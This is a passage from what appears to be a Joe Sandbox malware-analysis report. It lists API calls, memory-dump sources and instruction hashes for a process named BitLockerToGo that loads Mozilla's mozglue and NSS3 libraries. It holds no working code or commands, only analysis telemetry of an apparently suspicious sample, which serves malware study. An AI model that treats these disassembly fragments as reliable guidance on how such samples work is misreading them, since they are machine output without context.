                                                                                                                                                        • Part of subcall function 6C83CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C84CEEA,?,?,?,?,00000000,?,6C83DA31,00100000,?,?,00000000), ref: 6C83CB57
                                                                                                                                                        • Part of subcall function 6C83CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C83CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C84CEEA,?,?), ref: 6C83CBAF
                                                                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84D058
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 861561044-0
                                                                                                                                                      • Opcode ID: e627bb4813b9ad9d1afad87619a4017ac6b9aafeea007a36cbab70c8455060ea
                                                                                                                                                      • Instruction ID: 5e9c09853ec4c143c88dc51497e5ee24e29f5b502984b70fb21274f4b48f42f9
                                                                                                                                                      • Opcode Fuzzy Hash: e627bb4813b9ad9d1afad87619a4017ac6b9aafeea007a36cbab70c8455060ea
                                                                                                                                                      • Instruction Fuzzy Hash: B3D17171A04B469FD718CF28C580799F7E1BF99308F018A2DD85987712EB71E9A5CBC1
                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6C815D40
                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C87F688), ref: 6C815D67
                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C815DB4
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C815DED
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 557828605-0
                                                                                                                                                      • Opcode ID: 484c02619ae84f9191f7f570674447f18ed104c1204544f6cc6a180377c54108
                                                                                                                                                      • Instruction ID: 73858fdc1c0de2ca49d0058051b95a29109e6cd0a893e096729b482e5ff32325
                                                                                                                                                      • Opcode Fuzzy Hash: 484c02619ae84f9191f7f570674447f18ed104c1204544f6cc6a180377c54108
                                                                                                                                                      • Instruction Fuzzy Hash: CB515071E0422A8FCF29CF69C958AAEB7B1FB55308F194A29D811A7B50D7306D45CBE0
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7FCEBD
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C7FCEF5
                                                                                                                                                      • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C7FCF4E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                      • String ID: 0
                                                                                                                                                      • API String ID: 438689982-4108050209
                                                                                                                                                      • Opcode ID: 0287a598e04f778db4bec32e75e5f40f885ea49f5e318db116d0d8ff622624cc
                                                                                                                                                      • Instruction ID: 3b29af0f3732a63476b81d04f83dfe91de0fc0efd8798e5ab0dc3e25b292b01f
                                                                                                                                                      • Opcode Fuzzy Hash: 0287a598e04f778db4bec32e75e5f40f885ea49f5e318db116d0d8ff622624cc
                                                                                                                                                      • Instruction Fuzzy Hash: A051F276A002568FCB10CF18C490AAAFBA5EF99304F1985ADD8595F752D731AD06CBE0
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C916C8D
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C916CA9
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C916CC0
                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CA38FE0), ref: 6C916CFE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2370200771-0
                                                                                                                                                      • Opcode ID: 5baf8dd862cf0337621d920a2a210c8d5695710a69952acf9b704c26a24a69bb
                                                                                                                                                      • Instruction ID: 51258ad5a84a189b5665bfd68484339cf63f6d5d05f4abe94db34c2219221c8b
                                                                                                                                                      • Opcode Fuzzy Hash: 5baf8dd862cf0337621d920a2a210c8d5695710a69952acf9b704c26a24a69bb
                                                                                                                                                      • Instruction Fuzzy Hash: 893170B5E0521A9FDB04CF65C852ABFBBF9EB55248B10442DD905D7B40EB31D905CBA0
                                                                                                                                                      APIs
                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C8382BC,?,?), ref: 6C83649B
                                                                                                                                                        • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8364A9
                                                                                                                                                        • Part of subcall function 6C82FA80: GetCurrentThreadId.KERNEL32 ref: 6C82FA8D
                                                                                                                                                        • Part of subcall function 6C82FA80: AcquireSRWLockExclusive.KERNEL32(6C87F448), ref: 6C82FA99
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C83653F
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C83655A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3596744550-0
                                                                                                                                                      • Opcode ID: 2537303c6362104453506b40d6223bc78ac3f08c3b4067fbfe49160d18e8c47d
                                                                                                                                                      • Instruction ID: 9bde2f6bd1c7e362602e41df21a3ed2e77feb0f4254ec9d0727f9abb00474591
                                                                                                                                                      • Opcode Fuzzy Hash: 2537303c6362104453506b40d6223bc78ac3f08c3b4067fbfe49160d18e8c47d
                                                                                                                                                      • Instruction Fuzzy Hash: A83161B5A043159FD710CF18D98469EBBE4BF89314F10483EE85A97741DB34E919CBD2
                                                                                                                                                      APIs
                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6C986E36
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C986E57
                                                                                                                                                        • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6C986E7D
                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6C986EAA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3163584228-0
                                                                                                                                                      • Opcode ID: bfd119d6b8af82c85c22f5ca7011f537ba2ceea0dc360c5cc2c2bc5b22de8a22
                                                                                                                                                      • Instruction ID: 7cb223104cbb7e9a6e37181245afa3b2943426613da390be474db52b65b826b2
                                                                                                                                                      • Opcode Fuzzy Hash: bfd119d6b8af82c85c22f5ca7011f537ba2ceea0dc360c5cc2c2bc5b22de8a22
                                                                                                                                                      • Instruction Fuzzy Hash: 0931A531632A16EFDB145F34DD043A6B7A8AB1131AF104A3CD499DBA42EB31F564CFA1
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C982E08
                                                                                                                                                        • Part of subcall function 6C9714C0: TlsGetValue.KERNEL32 ref: 6C9714E0
                                                                                                                                                        • Part of subcall function 6C9714C0: EnterCriticalSection.KERNEL32 ref: 6C9714F5
                                                                                                                                                        • Part of subcall function 6C9714C0: PR_Unlock.NSS3 ref: 6C97150D
                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000400), ref: 6C982E1C
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C982E3B
                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C982E95
                                                                                                                                                        • Part of subcall function 6C971200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C9188A4,00000000,00000000), ref: 6C971228
                                                                                                                                                        • Part of subcall function 6C971200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C971238
                                                                                                                                                        • Part of subcall function 6C971200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C9188A4,00000000,00000000), ref: 6C97124B
                                                                                                                                                        • Part of subcall function 6C971200: PR_CallOnce.NSS3(6CA72AA4,6C9712D0,00000000,00000000,00000000,?,6C9188A4,00000000,00000000), ref: 6C97125D
                                                                                                                                                        • Part of subcall function 6C971200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C97126F
                                                                                                                                                        • Part of subcall function 6C971200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C971280
                                                                                                                                                        • Part of subcall function 6C971200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C97128E
                                                                                                                                                        • Part of subcall function 6C971200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C97129A
                                                                                                                                                        • Part of subcall function 6C971200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C9712A1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1441289343-0
                                                                                                                                                      • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                      • Instruction ID: 08869fb2fe5ada27cdbb667d9fe2d802c0c6a0a5d88ce0ff290befd466641404
                                                                                                                                                      • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                      • Instruction Fuzzy Hash: 1421D4B1D027454BE710CF549D48BAA3768AFB130CF110669DD086B753F7B1E69882B6
                                                                                                                                                      APIs
                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6C93ACC2
                                                                                                                                                        • Part of subcall function 6C912F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C912F0A
                                                                                                                                                        • Part of subcall function 6C912F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C912F1D
                                                                                                                                                        • Part of subcall function 6C912AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C910A1B,00000000), ref: 6C912AF0
                                                                                                                                                        • Part of subcall function 6C912AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C912B11
                                                                                                                                                      • CERT_DestroyCertList.NSS3(00000000), ref: 6C93AD5E
                                                                                                                                                        • Part of subcall function 6C9557D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C91B41E,00000000,00000000,?,00000000,?,6C91B41E,00000000,00000000,00000001,?), ref: 6C9557E0
                                                                                                                                                        • Part of subcall function 6C9557D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C955843
                                                                                                                                                      • CERT_DestroyCertList.NSS3(?), ref: 6C93AD36
                                                                                                                                                        • Part of subcall function 6C912F50: CERT_DestroyCertificate.NSS3(?), ref: 6C912F65
                                                                                                                                                        • Part of subcall function 6C912F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C912F83
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C93AD4F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 132756963-0
                                                                                                                                                      • Opcode ID: a753bf648f819d2711049875290816c68527faf898a49db4dc2c072f3383b09f
                                                                                                                                                      • Instruction ID: 88e9d7062f2c873e6e351d65f508a7f9910b1d04357db009e60a42fb238bca54
                                                                                                                                                      • Opcode Fuzzy Hash: a753bf648f819d2711049875290816c68527faf898a49db4dc2c072f3383b09f
                                                                                                                                                      • Instruction Fuzzy Hash: 9C21C6B1D002288BEF11DFA4D8055EEB7B4EF25208F459068D8197B710FB31EA55CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C96F0AD,6C96F150,?,6C96F150,?,?,?), ref: 6C96ECBA
                                                                                                                                                        • Part of subcall function 6C970FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9187ED,00000800,6C90EF74,00000000), ref: 6C971000
                                                                                                                                                        • Part of subcall function 6C970FF0: PR_NewLock.NSS3(?,00000800,6C90EF74,00000000), ref: 6C971016
                                                                                                                                                        • Part of subcall function 6C970FF0: PL_InitArenaPool.NSS3(00000000,security,6C9187ED,00000008,?,00000800,6C90EF74,00000000), ref: 6C97102B
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C96ECD1
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                        • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                        • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                        • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C96ED02
                                                                                                                                                        • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97116E
                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C96ED5A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2957673229-0
                                                                                                                                                      • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                      • Instruction ID: a9cedf248f1b2fd2a96d375b5c292df7420bbd29d13cbc215d4f00dc648c1e15
                                                                                                                                                      • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                      • Instruction Fuzzy Hash: 57219FB1A017429BE700CF26DD54B52B7E4BFA5348F25C219A81C87AA1FB70E594C6E0
                                                                                                                                                      APIs
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C987FFA,?,6C989767,?,8B7874C0,0000A48E), ref: 6C99EDD4
                                                                                                                                                      • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C987FFA,?,6C989767,?,8B7874C0,0000A48E), ref: 6C99EDFD
                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C987FFA,?,6C989767,?,8B7874C0,0000A48E), ref: 6C99EE14
                                                                                                                                                        • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                        • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,6C989767,00000000,00000000,6C987FFA,?,6C989767,?,8B7874C0,0000A48E), ref: 6C99EE33
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3903481028-0
                                                                                                                                                      • Opcode ID: 7fb2d5fef29f1f5a7e0d5e6b48bff22a551c65b9b311997a83f837b0acae658d
                                                                                                                                                      • Instruction ID: 9441a41b524af3f70b2471a5dc5361e83b37d547fd24a48319b2cd447dc3cb78
                                                                                                                                                      • Opcode Fuzzy Hash: 7fb2d5fef29f1f5a7e0d5e6b48bff22a551c65b9b311997a83f837b0acae658d
                                                                                                                                                      • Instruction Fuzzy Hash: 1011C2B1A00706ABEB109EA5DC84B16B3ACFF1435DF284535E919C2A00E331F8A4C7E1
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C80B4F5
                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C80B502
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C80B542
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C80B578
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2047719359-0
                                                                                                                                                      • Opcode ID: 0459e11445f53309a9dd8441a62b319ad9197b255813094dedc9b56f03674036
                                                                                                                                                      • Instruction ID: 2eb07a06f263d60da31e16658d84af6e392f2d96c790354e6629fd20e02fcc7b
                                                                                                                                                      • Opcode Fuzzy Hash: 0459e11445f53309a9dd8441a62b319ad9197b255813094dedc9b56f03674036
                                                                                                                                                      • Instruction Fuzzy Hash: B1119331A04B55C7D7328F29CA08766B3B1FF9631CF145B5AD84953A01FB71A1D5C7A0
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
